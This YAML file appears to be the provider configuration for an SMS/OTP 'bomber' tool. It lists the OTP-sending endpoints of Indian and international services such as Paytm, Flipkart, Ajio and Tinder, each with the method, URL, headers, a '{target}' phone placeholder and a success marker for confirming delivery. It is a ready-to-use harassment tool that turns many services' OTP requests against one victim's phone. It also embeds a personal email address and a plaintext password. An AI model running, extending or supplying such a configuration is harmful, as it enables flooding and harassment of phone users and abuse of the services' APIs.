# SPDX-License-Identifier: GPL-3.0-or-later

providers:
  '91':
    - name: justdial
      method: GET
      url: https://t.justdial.com/api/india_api_write/18july2018/sendvcode.php
      params:
        mobile: '{target}'
      identifier: 'sent'

    - name: housing
      method: POST
      url: https://login.housing.com/api/v2/send-otp
      data_type: json
      headers:
        Content-Type: application/json
        Origin: https://housing.com
      data:
        phone: '{target}'
      identifier: 'sent'

    - name: pharmeasy
      method: POST
      url: https://pharmeasy.in/api/auth/requestOTP
      data_type: json
      headers:
        User-Agent: Mozilla/5.0
        Origin: https://pharmeasy.in
      data:
        contactNumber: '{target}'
      identifier: 'resendSmsCounter'

    - name: confirmtkt
      method: GET
      url: https://securedapi.confirmtkt.com/api/platform/register
      params:
        newOtp: 'true'
        mobile_number: '{target}'
      identifier: 'false'

    - name: myupchar
      method: GET
      url: https://www.myupchar.com/consultation/store_otp
      headers:
        User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:79.0) Gecko/20100101 Firefox/79.0
        X-Requested-With: XMLHttpRequest
        Referer: https://www.myupchar.com/consultation/query
      params:
        phone: '{target}'
      identifier: 'आपके मोबाइल नंबर पर OTP भेज दिया गया है।'

    - name: ajio
      method: POST
      url: https://login.web.ajio.com/api/auth/signupSendOTP
      data:
        firstName: Aadit
        login: techyfatcat@gmail.com
        password: Password@123
        genderType: Male
        mobileNumber: '{target}'
        requestType: SENDOTP
      identifier: '1'

    - name: paytm
      method: POST
      url: https://commonfront.paytm.com/v4/api/sendsms
      data_type: json
      data:
        phone: '{target}'
        guid: 2952fa812660c58dc160ca6c9894221d
      identifier: '202'

  multi:
    - name: flipkart
      method: POST
      cc_target: loginId
      url: https://www.flipkart.com/api/5/user/otp/generate
      headers:
        X-user-agent: Mozilla/5.0 (X11; Linux x86_64) FKUA/website/41/Desktop
        Origin: https://www.flipkart.com
        Content-Type: application/x-www-form-urlencoded
      data:
        loginId: +{target}
      identifier: emailMask

    - name: gotinder
      method: POST
      url: https://api.gotinder.com/v2/auth/sms/send?auth_type=sms&locale=ru
      data:
        phone_number: '{cc}{target}'
      identifier: '200'